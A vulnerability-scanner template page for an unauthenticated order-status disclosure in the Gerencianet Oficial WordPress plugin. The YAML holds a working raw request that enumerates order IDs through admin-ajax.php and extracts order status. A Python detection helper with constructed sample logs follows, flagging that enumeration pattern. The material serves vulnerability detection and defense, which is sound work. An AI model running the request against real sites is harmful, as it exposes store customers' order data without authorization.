WordPress Gerencianet Oficial <= 3.1.3 - Unauthenticated Order Status Disclosure
CVE-2025-59136
Verified
Description
Efí Bank Gerencianet Oficial <= 3.1.3 contains an insertion of sensitive information into sent data vulnerability, caused by improper handling of embedded sensitive data, that allows unauthenticated attackers to retrieve that data. Exploitation requires crafted requests.
Severity
Medium
Published Date
April 23, 2026
Template Author
pussycat0x
CVE-2025-59136.yaml
id: CVE-2025-59136

info:
  name: WordPress Gerencianet Oficial <= 3.1.3 - Unauthenticated Order Status Disclosure
  author: pussycat0x
  severity: medium
  description: |
    Efí Bank Gerencianet Oficial <= 3.1.3 contains an insertion of sensitive information into sent data vulnerability, caused by improper handling of embedded sensitive data, that allows unauthenticated attackers to retrieve that data. Exploitation requires crafted requests.
  impact:
    Attackers can retrieve embedded sensitive data, leading to information disclosure.
  remediation: |
    Update to the latest version beyond 3.1.3.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-gerencianet-official/gerencianet-oficial-313-unauthenticated-information-exposure
    - https://patchstack.com/database/wordpress/plugin/woo-gerencianet-official/vulnerability/wordpress-gerencianet-oficial-plugin-3-1-3-sensitive-data-exposure-vulnerability
  metadata:
    verified: true
  tags: cve,cve2025,wordpress,wp-plugin,gerencianet,woocommerce

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=gn_check_order_status&order_id={{order_id}}

    attack: batteringram
    payloads:
      order_id:
        - "1"
        - "2"
        - "3"
        - "4"
        - "5"
        - "6"
        - "7"
        - "8"
        - "9"
        - "10"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - '"current_status"'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: json
        part: body
        name: order_status
        json:
          - '.data.current_status'
# digest: 490a0046304402201c626019732d75952114c5ecb2bfcd63d197df468efb7729fa47e99be9415f8d02204b1fc5c7df4903bee717fc3ffb96bfd8451b22954f40429c1e4abee8da4b499b:922c64590222798bb761d5b6d8e729505
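The template above sends unauthenticated POSTs to admin-ajax.php with action=gn_check_order_status and walks order_id values 1 through 10, so a site that cannot update immediately can at least watch for that pattern. The following detection helper is an added example, not part of the template or the plugin; it assumes a WAF or application audit log that records POST parameters and whether the request carried a logged-in WordPress session (the JSON field names and the sample log lines are constructed for this example). It flags unauthenticated calls to that action and reports sources that query several distinct order_id values in a short window, which is the enumeration behaviour the template's batteringram payload list produces.

```python
"""Detection helper for unauthenticated gn_check_order_status calls (added example).

Assumption: the log source records POST parameters and the WordPress user for each
request. The field names (ts, src, method, path, params, wp_user) and the sample
lines below are constructed for this example, not taken from any real deployment.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample audit log (JSON lines); not real traffic.
SAMPLE_LOG = """\
{"ts": "2026-04-23T10:00:00Z", "src": "198.51.100.7", "method": "POST", "path": "/wp-admin/admin-ajax.php", "params": {"action": "gn_check_order_status", "order_id": "1"}, "wp_user": null}
{"ts": "2026-04-23T10:00:01Z", "src": "198.51.100.7", "method": "POST", "path": "/wp-admin/admin-ajax.php", "params": {"action": "gn_check_order_status", "order_id": "2"}, "wp_user": null}
{"ts": "2026-04-23T10:00:02Z", "src": "198.51.100.7", "method": "POST", "path": "/wp-admin/admin-ajax.php", "params": {"action": "gn_check_order_status", "order_id": "3"}, "wp_user": null}
{"ts": "2026-04-23T10:00:03Z", "src": "198.51.100.7", "method": "POST", "path": "/wp-admin/admin-ajax.php", "params": {"action": "gn_check_order_status", "order_id": "4"}, "wp_user": null}
{"ts": "2026-04-23T10:05:00Z", "src": "203.0.113.9", "method": "POST", "path": "/wp-admin/admin-ajax.php", "params": {"action": "gn_check_order_status", "order_id": "1042"}, "wp_user": "customer17"}
{"ts": "2026-04-23T10:06:00Z", "src": "203.0.113.10", "method": "POST", "path": "/wp-admin/admin-ajax.php", "params": {"action": "heartbeat"}, "wp_user": null}
{"ts": "2026-04-23T10:07:00Z", "src": "203.0.113.11", "method": "POST", "path": "/wp-admin/admin-ajax.php", "params": {"action": "gn_check_order_status", "order_id": "77"}, "wp_user": null}
"""

AJAX_PATH = "/wp-admin/admin-ajax.php"
TARGET_ACTION = "gn_check_order_status"  # AJAX action named in the template above


def parse_log(text):
    """Parse JSON lines into event dicts; timestamps become aware datetimes."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        event["ts"] = datetime.fromisoformat(event["ts"].replace("Z", "+00:00"))
        events.append(event)
    return events


def unauthenticated_status_calls(events):
    """Every call to the order-status action made without a WordPress session."""
    return [
        e for e in events
        if e["path"] == AJAX_PATH
        and e["params"].get("action") == TARGET_ACTION
        and e["wp_user"] is None
    ]


def _id_sort_key(value):
    # Numeric ids sort numerically, anything else lexically after them.
    return (not value.isdigit(), int(value) if value.isdigit() else value)


def enumeration_sources(events, window=timedelta(minutes=1), threshold=3):
    """Map source -> distinct order_ids for sources that hit >= threshold distinct
    order_ids inside any sliding window of the given length, unauthenticated."""
    by_src = defaultdict(list)
    for e in unauthenticated_status_calls(events):
        by_src[e["src"]].append((e["ts"], e["params"].get("order_id", "")))

    flagged = {}
    for src, calls in by_src.items():
        calls.sort()
        start = 0
        for end in range(len(calls)):
            # Advance the window start until all calls fit inside `window`.
            while calls[end][0] - calls[start][0] > window:
                start += 1
            window_ids = {oid for _, oid in calls[start:end + 1]}
            if len(window_ids) >= threshold:
                flagged[src] = sorted({oid for _, oid in calls}, key=_id_sort_key)
                break
    return flagged


if __name__ == "__main__":
    evts = parse_log(SAMPLE_LOG)
    print("unauthenticated status calls:", len(unauthenticated_status_calls(evts)))
    for src, ids in enumeration_sources(evts).items():
        print(f"ALERT enumeration from {src}: order_ids {ids}")
```

A single unauthenticated call (203.0.113.11 above) is worth logging but is not by itself proof of scanning; the sliding window is what separates the template's one-id-per-request sweep from ordinary traffic. The window and threshold are starting points and should be tuned against the site's real baseline. Detection does not replace the remediation the template states: update the plugin beyond 3.1.3.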